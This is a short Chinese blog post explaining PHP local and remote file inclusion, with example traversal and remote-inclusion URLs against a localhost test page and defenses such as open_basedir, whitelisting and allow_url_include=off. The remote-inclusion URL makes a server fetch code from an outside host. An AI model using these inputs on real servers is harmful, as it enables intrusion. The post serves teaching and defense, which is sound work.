php本地文件包含&远程文件包含

由头:面试的时候被问到了,有些东西还是实践的太少,写此博客记录一下。

php文件包含函数:

include()

require()

include_once()

require_once()

本地文件包含:

exploit:

包含当前目录的 lfi.txt(内容为):

php本地文件包含&远程文件包含_第1张图片

跨目录包含:

http://localhost:81/lfi/lfi.php?test=../lfi.txt #包含上层目录的lfi.txt文件
http://localhost:81/lfi/lfi.php?test=/lfi_in/lfi.txt #包含内层目录的lfi.txt文件

防御:

防止跨目录:

在php.ini中设置open_basedir

open_basedir = C:\Program Files\phpStudy\WWW\lfi #限制在当前目录下(包括子目录)
open_basedir = C:\Program Files\phpStudy\WWW\lfi\ #限制在当前目录下(不包括子目录)

open_basedir可被绕过:wooyun链接

防止本地文件包含:
使用枚举

$file =$_GET['test'];
switch ($file) {
	case 'lfi.txt':
		include('./lfi.txt');
		break;
	default:
		include('./notexists.txt');
		break;
}
?>



远程文件包含:


exploit:

http://localhost:81/lfi/rfi.php?file=http://ip_address/php/rfi/rfi.txt?

技巧:?被解释成url中的querystring,可用来在 远程文件包含 时 截断 代码中后面内容。

防御:

php.ini配置文件里allow_url_include=off


文件包含利用技巧:

1.远程文件包含时 利用 data://  (>5.2.0) 或者 input://协议

/rfi.php?file=data:text/plain,


附:php的安全配置

Register_globals =off

Open_basedir

Allow_url_include =off

Display_errors =off

Log_errors = on

Magic_quotes_gpc =off

Cgi.fix_pathinfo

Session.cookie_httponly








你可能感兴趣的:(web)